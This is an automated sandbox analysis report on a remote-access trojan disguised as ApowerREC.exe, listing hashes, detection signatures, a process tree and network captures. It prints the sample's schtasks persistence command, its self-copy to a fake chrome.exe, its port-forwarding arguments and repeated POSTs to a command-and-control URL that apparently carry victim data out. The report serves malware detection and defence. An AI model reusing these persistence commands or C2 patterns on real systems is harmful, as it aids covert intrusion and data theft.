Resubmissions

23/09/2021, 13:59 UTC

210923-ractvaefc5 8

22/08/2021, 12:44 UTC

210822-vqqzsf2ch6 10

Analysis

  • max time kernel
    301s
  • max time network
    305s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22/08/2021, 12:44 UTC

General

  • Target

    ApowerREC.exe

  • Size

    8.9MB

  • MD5

    810be064429970190268a24af354a2f1

  • SHA1

    f5e17599a9c30a9eada1dcb276b888bdeffd037d

  • SHA256

    7edf30b359be3f27c9e7313352bc2d4cccb0e36010b34633646ea4823a70a82b

  • SHA512

    d385f16cb89fff66926770768d34686963dededf2fe47cb3889fc1ab9ae791c9067b76d78d0f5b58f2a29d9bdb2e709a672d560c97cf34e1834230b322c157b0

Malware Config

Signatures

  • RevcodeRat, WebMonitorRat

    WebMonitor is a remote access tool that you can use from any browser access to control, and monitor your phones, or PCs.

  • WebMonitor Payload 1 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ApowerREC.exe
    "C:\Users\Admin\AppData\Local\Temp\ApowerREC.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c
      2⤵
        PID:3384
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2⤵
          PID:212
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe'" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe'" /f
            3⤵
            • Creates scheduled task(s)
            PID:2356
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\ApowerREC.exe" "C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe"
          2⤵
            PID:4048
        • C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
          C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3264
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c
            2⤵
              PID:200
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              2⤵
                PID:2732
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 1892
                2⤵
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3412
            • C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
              C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:512
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c
                2⤵
                  PID:2172
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  2⤵
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2420
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    -d 56007 TCP
                    3⤵
                      PID:1504
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      -a 10.10.0.30 56007 56007 TCP
                      3⤵
                        PID:2060
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        -d 56008 TCP
                        3⤵
                          PID:3800
                        • C:\Users\Admin\AppData\Local\Temp\revpe.exe
                          -d 56008 TCP
                          3⤵
                          • Executes dropped EXE
                          PID:808
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          -a 10.10.0.30 56008 56008 TCP
                          3⤵
                            PID:3896
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1868
                          2⤵
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1348
                      • C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
                        C:\Users\Admin\AppData\Local\Temp\chrome\chrome.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3884
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c
                          2⤵
                            PID:3264
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                            2⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2260
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 1868
                            2⤵
                            • Program crash
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1112

                        Network

                        • flag-unknown
                          DNS
                          google.com
                          chrome.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          google.com
                          IN A
                          Response
                          google.com
                          IN A
                          216.58.214.14
                        • flag-unknown
                          HEAD
                          http://google.com/
                          ApowerREC.exe
                          Remote address:
                          216.58.214.14:80
                          Request
                          HEAD / HTTP/1.1
                          Host: google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 301 Moved Permanently
                          Location: http://www.google.com/
                          Content-Type: text/html; charset=UTF-8
                          Date: Sun, 22 Aug 2021 12:45:05 GMT
                          Expires: Tue, 21 Sep 2021 12:45:05 GMT
                          Cache-Control: public, max-age=2592000
                          Server: gws
                          Content-Length: 219
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                        • flag-unknown
                          HEAD
                          http://www.google.com/
                          ApowerREC.exe
                          Remote address:
                          172.217.19.196:80
                          Request
                          HEAD / HTTP/1.1
                          Host: www.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: text/html; charset=ISO-8859-1
                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                          Date: Sun, 22 Aug 2021 12:45:05 GMT
                          Server: gws
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Transfer-Encoding: chunked
                          Expires: Sun, 22 Aug 2021 12:45:05 GMT
                          Cache-Control: private
                          Set-Cookie: NID=221=HzqJB51Xw0JOuEzGUMQuFB4QUGXreOqPWP4uQZbuFbqrEjkmyfHXvwE1VWAGjRkuCTL0ycNdiO3P4tmzQafFAf3YBbmsUKqSufLGYWBlhSmu8s2yTlx1hdOsFQos3ZXbCWtLPtjEG_vVYitlzQf1OuR0S7JmebYWXcLKRMy-gTQ; expires=Mon, 21-Feb-2022 12:45:05 GMT; path=/; domain=.google.com; HttpOnly
                        • flag-unknown
                          HEAD
                          http://google.com/
                          chrome.exe
                          Remote address:
                          216.58.214.14:80
                          Request
                          HEAD / HTTP/1.1
                          Host: google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 301 Moved Permanently
                          Location: http://www.google.com/
                          Content-Type: text/html; charset=UTF-8
                          Date: Sun, 22 Aug 2021 12:47:39 GMT
                          Expires: Tue, 21 Sep 2021 12:47:39 GMT
                          Cache-Control: public, max-age=2592000
                          Server: gws
                          Content-Length: 219
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                        • flag-unknown
                          HEAD
                          http://www.google.com/
                          chrome.exe
                          Remote address:
                          172.217.19.196:80
                          Request
                          HEAD / HTTP/1.1
                          Host: www.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: text/html; charset=ISO-8859-1
                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                          Date: Sun, 22 Aug 2021 12:47:40 GMT
                          Server: gws
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Transfer-Encoding: chunked
                          Expires: Sun, 22 Aug 2021 12:47:40 GMT
                          Cache-Control: private
                          Set-Cookie: NID=221=worHg1Xs_ENKEc9D77GwwOGchfZRx462xSQzwckGNRkIKIcbQPfwW3hnKpSWmsiI-Egy8P-IqnPCyScTpJJw-0ER2hTVE9VsYBDXfOAFTXzJXOIRkS062SPMUEeXMr-rdWuoGiN1X7H5W4CE_LoyTpp7QXHDXGnSZlZblvAtljU; expires=Mon, 21-Feb-2022 12:47:40 GMT; path=/; domain=.google.com; HttpOnly
                        • flag-unknown
                          HEAD
                          http://google.com/
                          chrome.exe
                          Remote address:
                          216.58.214.14:80
                          Request
                          HEAD / HTTP/1.1
                          Host: google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 301 Moved Permanently
                          Location: http://www.google.com/
                          Content-Type: text/html; charset=UTF-8
                          Date: Sun, 22 Aug 2021 12:48:38 GMT
                          Expires: Tue, 21 Sep 2021 12:48:38 GMT
                          Cache-Control: public, max-age=2592000
                          Server: gws
                          Content-Length: 219
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                        • flag-unknown
                          HEAD
                          http://www.google.com/
                          chrome.exe
                          Remote address:
                          172.217.19.196:80
                          Request
                          HEAD / HTTP/1.1
                          Host: www.google.com
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Content-Type: text/html; charset=ISO-8859-1
                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                          Date: Sun, 22 Aug 2021 12:48:38 GMT
                          Server: gws
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Transfer-Encoding: chunked
                          Expires: Sun, 22 Aug 2021 12:48:38 GMT
                          Cache-Control: private
                          Set-Cookie: NID=221=rQJKe2vStoiLvz9rGz3o7co3Y8JHJo0lDs_HnTxhpxrIAcKBhoQZEEtrFFnLWlaSvBrBIPGrc4itctXjkLtPcPb6-lzJCpZWP7gTMGe2UuUhTXMZUA3W-G36mIuAROBKOTe5BnthTDVkU13qleqpqIECGuEgXhkbiKixeoRINK0; expires=Mon, 21-Feb-2022 12:48:38 GMT; path=/; domain=.google.com; HttpOnly
                        • flag-unknown
                          DNS
                          sdns.se
                          AppLaunch.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          sdns.se
                          IN A
                          Response
                          sdns.se
                          IN A
                          185.243.215.214
                        • flag-unknown
                          DNS
                          ntp.se
                          AppLaunch.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          ntp.se
                          IN A
                          Response
                          ntp.se
                          IN A
                          194.58.200.20
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          185.243.215.214:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          1.2.4.8:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                          Response
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          1.2.4.8:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                          Response
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          114.114.114.114:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                          Response
                        • flag-unknown
                          DNS
                          387d8b62b0aef501f4f4ebef23416753.se
                          AppLaunch.exe
                          Remote address:
                          114.114.114.114:53
                          Request
                          387d8b62b0aef501f4f4ebef23416753.se
                          IN A
                          Response
                        • flag-unknown
                          DNS
                          teamseed.wm01.to
                          AppLaunch.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          teamseed.wm01.to
                          IN A
                          Response
                          teamseed.wm01.to
                          IN A
                          45.153.186.90
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 184
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 3
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 295
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 207
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 200
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          Vary: Accept-Encoding
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35133
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 165
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 165
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 157
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 207
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35393
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36325
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36549
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36049
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • flag-unknown
                          POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
